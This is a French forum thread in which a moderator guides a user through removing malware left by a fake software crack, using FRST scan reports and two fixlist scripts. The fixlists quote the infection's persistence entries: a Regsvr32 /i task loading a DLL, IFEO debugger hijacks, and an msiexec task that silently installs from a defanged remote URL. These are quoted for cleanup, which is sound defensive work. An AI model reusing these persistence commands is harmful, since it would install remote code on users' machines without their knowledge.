Signaler

Avoir un ordinateur sain après Virus [Résolu]

Posez votre question Nyd - Dernière réponse le 17 mai 2017 à 20:06 par Nyd
Bonjour,

Je me suis fait avoir comme une bleu en installant un truc que j'aurais pas du sous conseil d'une personne.... Je me suis retrouvé avec pleins de virus/ trojan /malware etc.

J'ai passé Ccleaner/// Adwcleaner / MalwareByte et avast et désinstallé des programmes qui paraissaient louche.

Après plusieurs scans/ élimination / redémarrage, le PC à l'air saint

Mais est-ce qu'il existe un un moyen d'en être sûr? qu'il ne reste pas encore des saloperies qui seraient passé entre les mailles du filet ?


Merci d'avance

Afficher la suite 
Utile
+1
plus moins
Salut,

oui avec FRST :

Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).

Télécharge et lance le scan FRST, 3 rapports FRST seront générés :
  • FRST.txt
  • Shortcut.txt
  • Additionnal.txt


Envoie ces 3 rapports sur le site http://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.

Donnez votre avis
Utile
+1
plus moins
Tout est venu à la suite d'un faux crack vérolés...

Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.

Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :

CreateRestorePoint:
CloseProcesses:
Task: {0F0C0674-FF87-488B-B499-8FB7426FEBA7} - System32\Tasks\{BC652070-9847-1E68-4E4F-7CEA690FCD68} => Regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\32cbbc3b\338492de.dll" <==== ATTENTION
Task: {5BB4ED62-8033-4204-8078-003599CB97F0} - System32\Tasks\Reavertaindrebudom Cache => C:\Program Files (x86)\Copichreerniry\prferght.exe
C:\Program Files (x86)\Copichreerniry
2017-05-12 19:14 - 2017-05-12 19:14 - 00004186 _____ C:\WINDOWS\System32\Tasks\{4D90BDE1-FA3B-0A4A-0025-6DC1BE55140A}
2017-05-12 19:14 - 2017-05-12 19:14 - 00003886 _____ C:\WINDOWS\System32\Tasks\{BC652070-9847-1E68-4E4F-7CEA690FCD68}
2017-05-12 19:13 - 2017-05-12 19:13 - 00000000 ____D C:\Users\Default\AppData\Local\AdvinstAnalytics
2017-05-12 19:13 - 2017-05-12 19:13 - 00000000 ____D C:\Users\Default User\AppData\Local\AdvinstAnalytics
2017-05-12 19:11 - 2017-05-12 19:39 - 00000000 ____D C:\Users\Magalie\AppData\Roaming\ServerTest
2017-05-12 19:10 - 2017-05-12 19:13 - 00001289 _____ C:\Users\Magalie\Desktop\Google Chrome.lnk
2017-05-12 19:10 - 2017-05-12 19:10 - 00021584 _____ C:\WINDOWS\System32\Tasks\zvEtr0XATiCp
2017-05-12 19:07 - 2017-05-12 19:22 - 00000000 ____D C:\Users\Magalie\AppData\Roaming\Praition
2017-05-12 19:07 - 2017-05-12 19:07 - 00006180 _____ C:\WINDOWS\System32\Tasks\Reavertaindrebudom Cache
2017-05-12 19:07 - 2017-05-12 19:07 - 00000000 ____D C:\Users\Magalie\AppData\Local\Solyrebich
2017-05-12 19:06 - 2017-05-12 19:06 - 00140800 _____ C:\Users\Magalie\AppData\Local\installer.dat
2017-05-12 19:06 - 2017-05-12 19:06 - 00011568 _____ C:\Users\Magalie\AppData\Local\InstallationConfiguration.xml
2017-05-12 19:06 - 2017-05-12 19:06 - 00000000 ____D C:\WINDOWS\system32\sstmp
2017-05-12 19:06 - 2017-05-12 19:06 - 00000000 ____D C:\Users\Magalie\AppData\Local\CrashRpt
2017-05-12 19:05 - 2017-05-12 19:22 - 00000000 ____D C:\Users\Magalie\AppData\Local\Ufmedia
2017-05-12 19:02 - 2017-05-12 19:20 - 00000000 ____D C:\Program Files (x86)\KMSPico 10.2.1 Final
2017-05-12 18:34 - 2017-05-13 10:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\eMuleTorrent
2017-05-12 18:34 - 2017-05-12 19:00 - 00000000 ____D C:\Users\Magalie\AppData\Roaming\mulehome
2017-05-12 18:34 - 2017-05-12 18:38 - 00000155 _____ C:\WINDOWS\
2017-05-12 18:34 - 2017-05-12 18:35 - 00000000 ____D C:\Users\Magalie\AppData\Local\eMuleTorrent
2017-05-12 18:33 - 2017-05-12 19:20 - 00000000 ____D C:\Program Files (x86)\eMuleTorrent
EmptyTemp:
RemoveProxy:
Reboot:


Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.

Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.

Redémarre l'ordinateur.

2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :

3°)
Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite

4°)
Vois ce que cela donne et si des améliorations ont eu lieu.
Si ce n'est pas le cas, s itu as encore des pages de pubs intempestives, précise sur quel navigateur WEB.


Donnez votre avis
Utile
+0
plus moins
Merci de la réponse


Voici les 3 fichiers

http://pjjoint.malekal.com/files.php?id=20170513_k11f5u8u8t9

http://pjjoint.malekal.com/files.php?id=20170513_e148z10v9x6

http://pjjoint.malekal.com/files.php?id=20170513_b13p12v8z12t6
Malekal_morte- 131327Messages postés mercredi 17 mai 2006Date d'inscription ModérateurStatut 21 mai 2017 Dernière intervention - 13 mai 2017 à 12:56
FRST.txt vide
tu n'as pas laissé le scan aller jusqu'au bout, je pense.
Répondre
Nyd- 13 mai 2017 à 13:16
en effet voilà

http://pjjoint.malekal.com/files.php?id=FRST_20170513_i12h12v6r15i15
Répondre
Donnez votre avis
Utile
+0
plus moins
Merci beaucoup oui en effet c'était ça..
Donnez votre avis
Utile
+0
plus moins
il faut suivre la procédure en entier et fournir tous les rapports.
Nyd- 16 mai 2017 à 12:39
C'est à dire redonner les 3 fichiers ?
Répondre
Malekal_morte- 131327Messages postés mercredi 17 mai 2006Date d'inscription ModérateurStatut 21 mai 2017 Dernière intervention - 16 mai 2017 à 13:14
oui refais un scan FRST à la fin et donne les nouveaux rapports de scans.
Répondre
Nyd- 16 mai 2017 à 16:52
d'accord merci

les voici :

http://pjjoint.malekal.com/files.php?id=20170516_o69n9s8n12
http://pjjoint.malekal.com/files.php?id=FRST_20170516_x9g15e5f8v9
http://pjjoint.malekal.com/files.php?id=20170516_z15l15s9z5i13
Répondre
Donnez votre avis
Utile
+0
plus moins
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.

Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :

CreateRestorePoint:
CloseProcesses:
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
2017-05-16 12:28 - 2017-05-16 12:28 - 00000000 ____D C:\Users\Magalie\AppData\Local\Footjane
2017-05-16 12:28 - 2017-05-16 12:28 - 00000000 ____D C:\Program Files (x86)\Footjane
2017-05-16 12:22 - 2017-05-16 12:23 - 00000000 ____D C:\Program Files (x86)\Copichreerniry
2017-05-16 12:22 - 2017-05-16 12:22 - 00000000 ____D C:\Terward
Task: {821C3241-8A1D-458D-BB99-181C2196269E} - \zvEtr0XATiCp -> Pas de fichier <==== ATTENTION
Task: {9EB6F289-25B0-4314-BD05-0A908BB310E5} - \Arurerly -> Pas de fichier <==== ATTENTION
Task: {2C124F75-1605-42C8-B9EB-35C31AD383A6} - System32\Tasks\Microsoft\Windows\DeviceSettings\Sutaied => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=WDCXWD10EZEX-00WN4A0_WD-WMC6Y0K2EHHE2EHHE&d=20170512 /q <==== ATTENTION
Shortcut: C:\Users\Magalie\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Footjane\Application\chrome.exe (Google Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Footjane\Application\chrome.exe (Google Inc.)
C:\Program Files (x86)\Footjane
EmptyTemp:
RemoveProxy:
Reboot:


Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.

Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.

Redémarre l'ordinateur.
Donnez votre avis
Utile
+0
plus moins
Voilà le fichier Fixlog
http://pjjoint.malekal.com/files.php?id=20170516_z10x13h9y13m9
Donnez votre avis
Utile
+0
plus moins
il reste quel problème et sur quel navigateur WEB ?
Nyd- 16 mai 2017 à 19:00
A priori non aucun problème (visible) pour le moment^^
Répondre
Donnez votre avis
Utile
+0
plus moins
cool =)



Supprime le dossier C:\FRST


Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite


Quelques conseils :

Pour ne plus te faire avoir.
A lire - Programmes parasites / PUPs : Dossier Adwares/PUPs : programmes indésirables et parasites
(Surtout active les détections LPIs pour détecter les programmes parasites et publicitaires)

Donnez votre avis

Les membres obtiennent plus de réponses que les utilisateurs anonymes.

Le fait d'être membre vous permet d'avoir un suivi détaillé de vos demandes.

Le fait d'être membre vous permet d'avoir des options supplémentaires.

Vous n'êtes pas encore membre ?

inscrivez-vous, c'est gratuit et ça prend moins d'une minute !